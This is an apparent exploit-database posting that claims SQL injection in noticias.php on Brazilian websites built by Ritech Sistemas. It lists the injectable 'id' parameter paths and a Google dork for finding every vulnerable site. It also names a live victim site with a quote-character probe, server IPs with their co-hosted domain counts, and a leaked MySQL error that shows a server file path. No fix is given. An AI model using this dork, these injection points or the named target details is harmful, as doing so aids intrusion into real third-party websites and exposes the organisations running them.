Desenvolvido por Ritech Sistemas Brazil SQL Injection

1. ##########################################################
2.  
3. # Exploit Title : Desenvolvido por Ritech Sistemas Brazil SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 16/01/2019
7. # Vendor Homepage : ritechsistemas.com - ritechsistemas.com.br
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desenvolvido por: Ritech Sistemas'' site:br
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ##########################################################
16.  
17. # SQL Injection Exploit :
18. ***********************
19.  
20. /noticias.php?id=[SQL Injection]
21.  
22. /v3/noticias.php?id=[SQL Injection]
23.  
24. ##########################################################
25.  
26. # Example Vulnerable Site :
27. *************************
28.  
29. [+] asthemg.org.br/v3/noticias.php?id=1011%27 =>
30.  
31. [ Proof of Concept ] => archive.is/DdI0w
32.  
33. Note : (177.185.194.166) => There are 427 domains hosted on this server.
34.  
35. Note : (177.185.194.174) => There are 59 domains hosted on this server.
36.  
37. ##########################################################
38.  
39. # SQL Database Error :
40. **********************
41.  
42. Warning: mysql_fetch_array() expects parameter 1 to be resource,
43.  
44. boolean given in /home/asthemg/www/v3/noticias.php on line 19
45.  
46. ##########################################################
47.  
48. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
49.  
50. ##########################################################